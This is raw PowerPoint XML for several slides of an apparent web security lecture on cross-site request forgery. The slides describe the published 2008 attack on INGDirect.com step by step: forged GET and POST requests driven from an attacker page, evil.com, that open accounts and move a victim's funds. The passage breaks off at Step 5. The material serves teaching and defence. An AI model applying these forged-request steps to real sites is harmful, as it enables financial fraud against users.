        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1636440"/>
            <a:ext cx="12241360" cy="7416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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A40800"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>In the bank example we saw the CSRF employed a forged GET request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="A40800"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>It is possible to execute a CSRF with a POST request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Why care? Some sites only accept POST requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Executing a POST-based CSRF requires JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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endParaRPr lang="en-CA" sz="3200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§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r>
              <a:rPr lang="en-CA" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Dynamically creates appropriate POST request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145204867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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another Example: GET and POST CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381720" y="1636440"/>
            <a:ext cx="12241360" cy="7416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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Actual attack discovered by Zeller and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Felten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>INGDirect.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3300" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Multinational company with $62 Billion in assets and 4.1 million customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3300" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3300" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0"/>
              <a:t>llowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0"/>
              <a:t>an attacker to open additional accounts on behalf of a user and transfer funds from a user’s account to the attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0"/>
              <a:t>account </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The bank site’s use of SSL didn’t prevent the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3300" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3300" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>First published CSRF on a financial institution (2008)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30683712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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingdirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack: GET and POST CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="453728" y="1924472"/>
            <a:ext cx="12241360" cy="705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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Step 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> Assume user is already authenticated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>ingdirect.com’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> site, and visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t> controlled by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buSzPct val="155000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endParaRPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Assume attacker has JavaScript on his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>, and JavaScript engine is enabled on user’s browser. JavaScript is needed to create POST requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Step 1: The attacker creates checking account on behalf of the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>The attacker causes the user’s browser to visit ING’s “open new account” page using an SRC tag on an image on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="3000" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="3000" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" smtClean="0"/>
              <a:t>forged GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0"/>
              <a:t>request to https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>secure.ingdirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1"/>
              <a:t>myaccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1"/>
              <a:t>INGDirect.html?command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>gotoOpenOCA</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3000" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック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85857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A3EDDC-6591-914B-8867-1A9A8997D2E5}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-12700" y="0"/>
            <a:ext cx="13017500" cy="1708448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5600" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingdirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack: GET and POST CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="453728" y="1924472"/>
            <a:ext cx="12241360" cy="705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457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Step 2: Causes a “single” account to be created using an appropriate POST command that is generated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>JavaScript loaded into user’s browser from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Step 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>The attacker chooses an arbitrary amount of money to initially transfer from the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>savings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>account to the new, fraudulent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>A POST request to https://secure. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1"/>
              <a:t>ingdirect.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1"/>
              <a:t>myaccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" err="1"/>
              <a:t>INGDirect.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t> with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>appropriate parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Step 4: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>attacker causes the user’s browser to click the final “Open Account” button, causing ING to open a new checking account on behalf of the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0"/>
              <a:t>using an appropriate POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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endParaRPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buSzPct val="155000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•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r>
              <a:rPr lang="en-CA" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Step 5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
